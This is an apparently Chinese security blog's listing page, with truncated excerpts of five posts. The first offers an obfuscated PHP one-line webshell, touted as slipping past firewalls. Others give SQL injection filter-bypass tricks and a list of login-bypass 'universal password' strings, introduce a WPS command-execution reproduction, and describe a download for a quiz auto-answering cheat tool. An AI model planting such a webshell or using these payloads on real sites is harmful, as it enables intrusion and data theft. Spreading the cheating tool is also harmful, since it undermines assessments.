这两天发现一个php一句话，挺骚气的，能过各种waf，分享给大家：代码<? @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);密码1 可以自由修改适用php版本>=7.0<? $a="Y;HJ(Z"^&...

写在前面最近很火的wps命令执行漏洞并不是0day，而是早在19年就发现的漏洞，我们今天尝试去复现一下。复现环境：官版WPS V11.1.0.12300，下载链接：https://official-package.wpscdn.cn/wps/download/WPS_Setup_12300.exe系统环境：kalilinux、暗魂定制版(win10)网...

过滤解决方案过滤空格, 可以使用括号() 或者注释 绕过过滤and, 可以使用or替代过滤union, 可以用盲注替代联合注入过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替盲注时，表名库名等名称请用16进制转换，前加 0x 后再进...

常见万能密码："or "a"="a'.).or.('.a.'='.aor 1=1--'or 1=1--a'or' 1=1--"or 1=1--'or.'a.'='a"or"="a'='a'or''=''or'='or'admin'or 1=1#'='&password='='admin' or 1=1#admin'//or//1=1#admin'/**...

2.252022年2月18日，新增特性：1.因云栖学院增加了题限制，我们增加了友好提示。2.去除了版本检测（太鸡肋）下载地址：https://shen.lanzoul.com/iPeig009t3ob2.242021年12月7日，新增特性：1.解决异常报错问题，恢复正常刷题2.新增控制正确率3.新增题目收集系统，题目会自动写入公共题库4.优化了杀软误报...